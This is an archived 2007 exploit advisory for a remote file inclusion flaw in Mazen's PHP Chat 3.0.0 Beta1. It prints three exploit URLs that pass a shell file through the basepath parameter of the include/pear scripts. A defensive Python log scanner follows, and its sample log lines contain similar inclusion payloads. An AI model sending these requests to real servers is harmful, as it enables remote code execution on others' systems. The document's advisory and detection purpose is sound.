vendor: Mazen's PHP Chat
by: ThE TiGeR
CVSS: 7.5 HIGH
Remote File Inclusion
CWE: 98
Product Name: Mazen's PHP Chat
Affected Version From: 3.0.0 Beta1
Affected Version To: 3.0.0 Beta1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Mazen’s PHP Chat V3.0.0 Beta1 Remote file inclusion

The vulnerability allows an attacker to include a remote file on the victim's server through the basepath parameter of the scripts under include/pear/, potentially leading to remote code execution.

Mitigation:

The vulnerability can be mitigated by validating and sanitizing user input, and by implementing proper file inclusion techniques.
Source

Exploit-DB raw data:

#Mazen's PHP Chat V3.0.0 Beta1 Remote file inclusion

#Download script : http://www.scriptbrasil.com.br/script/php/bate_papo/mazen_phpopenchmt221.tar.gz

#Thanks Str0ke :D

#Exploit :

#http://victim.com/[chat_path]/include/pear/ITX.php?basepath=shell.txt?
#http://victim.com/[chat_path]/include/pear/IT_Error.php?basepath=shell.txt?
#http://victim.com/[chat_path]/include/pear/IT.php?basepath= shell.txt?

#Discovered by ThE TiGeR

#Miro_Tiger[at]Hotmail.com

# milw0rm.com [2007-05-26]
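
Added example (not part of the original advisory or of the chat project's code): a Python scan of web-server access logs for direct requests to the three include/pear scripts that set the basepath parameter named above. The sample log lines, hosts and the /chat/ install path are constructed; it assumes Common Log Format and that legitimate traffic never sets basepath in the URL.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts and parameter named in the advisory.
PATH_RE = re.compile(r"/include/pear/(?:ITX|IT_Error|IT)\.php$", re.I)
PARAM = "basepath"
# Request field of a Common Log Format line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value that starts with a URL scheme or a protocol-relative "//".
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.I)

def classify(target):
    """Return 'remote-url', 'param-set' or None for one request target."""
    parts = urlsplit(target)
    if not PATH_RE.search(parts.path):
        return None
    # parse_qsl percent-decodes, so encoded schemes are caught too.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == PARAM:
            return "remote-url" if REMOTE_RE.match(value) else "param-set"
    return None

def scan(lines):
    """Return (line_number, verdict) for every suspicious log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        verdict = classify(match.group(1)) if match else None
        if verdict:
            hits.append((number, verdict))
    return hits

# Constructed sample log lines (documentation addresses and hostnames).
SAMPLE_LOG = [
    '203.0.113.7 - - [26/May/2007:10:00:01 +0000] "GET /chat/index.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [26/May/2007:10:00:02 +0000] "GET /chat/include/pear/ITX.php?basepath=http://files.example/a.txt? HTTP/1.1" 200 90',
    '203.0.113.7 - - [26/May/2007:10:00:03 +0000] "GET /chat/include/pear/IT.php?basepath=ftp%3A%2F%2Ffiles.example%2Fa.txt%3F HTTP/1.1" 200 90',
    '198.51.100.4 - - [26/May/2007:10:00:04 +0000] "GET /chat/include/pear/IT_Error.php?basepath=../ HTTP/1.1" 200 90',
    '198.51.100.4 - - [26/May/2007:10:00:05 +0000] "GET /chat/include/pear/IT.php HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}")
```

A 'remote-url' hit means the parameter carried a URL and warrants checking the host for unexpected outbound fetches; 'param-set' marks any other direct use of the parameter.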